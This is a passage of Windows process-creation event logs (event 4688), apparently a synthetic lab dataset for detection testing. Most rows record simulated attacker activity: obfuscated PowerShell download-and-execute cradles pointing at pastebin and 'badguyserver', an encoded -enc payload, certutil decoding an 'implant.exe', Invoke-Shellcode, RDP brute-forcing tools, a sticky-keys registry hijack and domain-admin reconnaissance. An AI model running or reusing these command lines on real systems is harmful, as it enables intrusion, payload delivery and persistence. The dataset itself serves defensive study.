102,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.617,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x132c,C:\Windows\System32\win32calc.exe,%%1936,0x123c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.617
103,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.930,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x156c,C:\Windows\System32\win32calc.exe,%%1936,0x154c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.930
104,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.977,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1580,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell  -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','google.png')}",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.977
105,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.053,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15a0,C:\Windows\System32\win32calc.exe,%%1936,0x1580,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.053
106,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.100,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15b4,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell.exe  -c ""$a = 'Download'+'String'+""(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))"";$b = '(New-Object' + ' Net.WebClient)';'$b.$a' | Out-File .\evil.ps1;""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.100
107,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.173,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15d4,C:\Windows\System32\win32calc.exe,%%1936,0x15b4,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.173
108,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.220,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15e8,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell  -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(""{2}{0}{1}""-f ':/','/paste','tp')+'bin/'+'raw/'+(""{1}{0}""-f'Em17','pqCw')));}",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.220
109,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.287,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1608,C:\Windows\System32\win32calc.exe,%%1936,0x15e8,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.287
110,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.337,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x161c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c "".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^ 'http://somedomain/best-kitten-names-1.jpg' ^-d^EStIN^At^IOn ^'C:\Users\$env:UserName\AppData\Local\Temp\kittens1.jpg';""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.337
111,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.407,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x163c,C:\Windows\System32\win32calc.exe,%%1936,0x161c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.407
112,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.453,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1650,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd   /c "".\n^e^t u^se^r""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.453
113,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.517,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1670,C:\Windows\System32\win32calc.exe,%%1936,0x1650,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.517
114,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.567,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1684,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,.\powershell  -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACkAIAAkAHQA,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.567
115,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.633,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16a4,C:\Windows\System32\win32calc.exe,%%1936,0x1684,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.633
116,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.683,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16b8,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.683
117,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.747,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16d8,C:\Windows\System32\win32calc.exe,%%1936,0x16b8,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.747
118,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.793,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16ec,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.793
119,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.867,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x170c,C:\Windows\System32\win32calc.exe,%%1936,0x16ec,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.867
120,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.767,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xa08,C:\Diagnostics\UserTmp\certutil.exe,%%1936,0xbc8,certutil  -decode delme.b64 implant.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.767
121,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.833,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x4e8,C:\Windows\System32\win32calc.exe,%%1936,0xa08,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\certutil.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.833
122,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.947,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x240,C:\Diagnostics\UserTmp\implant.exe,%%1936,0xbc8,implant.exe  k111,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.947
123,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.003,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1250,C:\Diagnostics\UserTmp\implant.exe,%%1936,0xbc8,implant.exe  81ed03caf6901e444c72ac67d192fb9c,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.003
124,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.067,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x140c,C:\Diagnostics\UserTmp\implant.exe,%%1936,0xbc8,implant.exe  -b -t -m,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.067
125,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.123,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x142c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme"" ",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.123
126,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.160,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1448,C:\Windows\System32\win32calc.exe,%%1936,0x140c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\implant.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.160
127,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.167,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1450,C:\Windows\System32\win32calc.exe,%%1936,0x240,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\implant.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.167
128,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.167,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1458,C:\Windows\System32\win32calc.exe,%%1936,0x1250,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\implant.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.167
129,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.337,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1498,C:\Windows\System32\win32calc.exe,%%1936,0x142c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.337
130,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.393,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14ac,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell  -Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.393
131,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.460,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14cc,C:\Windows\System32\win32calc.exe,%%1936,0x14ac,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.460
132,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.513,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14e0,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,.\powershell  Invoke-Shellcode.ps1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.513
133,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:35:15.673,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbdc,C:\Windows\System32\sppsvc.exe,%%1936,0x230,C:\Windows\system32\sppsvc.exe,C:\Windows\System32\services.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:35:15.673
134,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:35:16.060,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13a8,C:\Windows\System32\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\system32\wbem\wmiprvse.exe -Embedding,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:35:16.060
135,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:35:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:35:26.010
136,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.610,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1500,C:\Windows\System32\win32calc.exe,%%1936,0x14e0,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.610
137,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.670,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1514,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,.\powershell  Invoke-ReverseDnsLookup.ps1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.670
138,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.740,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1534,C:\Windows\System32\win32calc.exe,%%1936,0x1514,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.740
139,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.847,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x154c,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell  -command ""(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqCwEm17'));""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.847
140,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.160,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1490,C:\Windows\System32\net.exe,%%1936,0xbc8,net  localgroup Administrators,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.160
141,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.183,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1464,C:\Windows\System32\net1.exe,%%1936,0x1490,C:\Windows\system32\net1  localgroup Administrators,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.183
142,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.233,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x142c,C:\Windows\System32\whoami.exe,%%1936,0xbc8,whoami,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.233
143,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.283,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14b0,C:\Windows\System32\HOSTNAME.EXE,%%1936,0xbc8,hostname,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.283
144,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.317,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14c0,C:\Windows\System32\NETSTAT.EXE,%%1936,0xbc8,netstat  -an,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.317
145,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.440,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14fc,C:\Windows\System32\net.exe,%%1936,0xbc8,net  user Bob1 /domain,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.440
146,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.457,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14f0,C:\Windows\System32\net1.exe,%%1936,0x14fc,C:\Windows\system32\net1  user Bob1 /domain,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.457
147,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.483,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14e8,C:\Windows\System32\net.exe,%%1936,0xbc8,net  user BobX /domain,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.483
148,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.500,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x152c,C:\Windows\System32\net1.exe,%%1936,0x14e8,C:\Windows\system32\net1  user BobX /domain,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.500
149,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.520,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1520,C:\Windows\System32\net.exe,%%1936,0xbc8,"net  group ""Domain Admins"" /domain",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.520
150,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.533,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1514,C:\Windows\System32\net1.exe,%%1936,0x1520,"C:\Windows\system32\net1  group ""Domain Admins"" /domain",C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.533
151,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.553,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1550,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rUnDlL32  /C ShEll32Control_RanDLL.dll,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.553
152,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.570,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1560,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg  query add mscfile\\\\open,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.570
153,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.620,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1584,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg  add Image File Execution Options sethc.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.620
154,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.677,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1580,C:\Diagnostics\UserTmp\ftp.exe,%%1936,0xbc8,.\ftp  -s:C:\RECYCLER\xxppyy.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.677
155,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.727,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15c0,C:\Diagnostics\UserTmp\dubrute.exe,%%1936,0xbc8,.\dubrute.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.727
156,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.777,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1600,C:\Diagnostics\UserTmp\nlbrute.exe,%%1936,0xbc8,.\nlbrute.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.777
157,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.827,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15f0,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,".\reg  add ""HKLM\system\CurrentControlSet\Control\Terminal Server"" /v ""fDenyTSConnections"" /t REG_DWORD /d 0x1 /f",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.827
158,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:15.880,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x162c,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,".\reg  add ""HKLM\system\CurrentControlSet\Control\Terminal Server"" /v ""fDenyTSConnections"" /t REG_DWORD /d 0x0 /f",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:15.880
